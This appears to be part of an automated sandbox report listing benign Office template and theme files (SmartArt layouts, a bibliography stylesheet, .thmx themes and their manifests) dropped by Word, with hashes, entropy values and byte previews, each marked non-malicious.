                                                C:\Users\user\AppData\Local\Temp\TCDF211.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):254
                                                Entropy (8bit):3.4845992218379616
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF211.tmp\HexagonRadial.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):6024
                                                Entropy (8bit):7.886254023824049
                                                Encrypted:false
                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                C:\Users\user\AppData\Local\Temp\TCDF212.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):286
                                                Entropy (8bit):3.4670546921349774
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF212.tmp\ThemePictureAlternatingAccent.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):5630
                                                Entropy (8bit):7.87271654296772
                                                Encrypted:false
                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                Malicious:false
                                                Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                C:\Users\user\AppData\Local\Temp\TCDF232.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):252
                                                Entropy (8bit):3.48087342759872
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF232.tmp\PictureFrame.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):4326
                                                Entropy (8bit):7.821066198539098
                                                Encrypted:false
                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                Malicious:false
                                                Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                C:\Users\user\AppData\Local\Temp\TCDF233.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):292
                                                Entropy (8bit):3.5026803317779778
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                MD5:A0D51783BFEE86F3AC46A810404B6796
                                                SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF233.tmp\gosttitle.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):251032
                                                Entropy (8bit):5.102652100491927
                                                Encrypted:false
                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Local\Temp\TCDF245.tmp\Dividend.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):570901
                                                Entropy (8bit):7.674434888248144
                                                Encrypted:false
                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Local\Temp\TCDF245.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):282
                                                Entropy (8bit):3.5459495297497368
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF266.tmp\Basis.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):558035
                                                Entropy (8bit):7.696653383430889
                                                Encrypted:false
                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Local\Temp\TCDF266.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):276
                                                Entropy (8bit):3.5361139545278144
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                MD5:133D126F0DE2CC4B29ECE38194983265
                                                SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF277.tmp\Frame.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):523048
                                                Entropy (8bit):7.715248170753013
                                                Encrypted:false
                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Local\Temp\TCDF277.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):276
                                                Entropy (8bit):3.5159096381406645
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF2A9.tmp\Wood_Type.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1649585
                                                Entropy (8bit):7.875240099125746
                                                Encrypted:false
                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                Malicious:false
                                                Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                C:\Users\user\AppData\Local\Temp\TCDF2A9.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):284
                                                Entropy (8bit):3.5552837910707304
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF2CA.tmp\Metropolitan.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):777647
                                                Entropy (8bit):7.689662652914981
                                                Encrypted:false
                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                Malicious:false
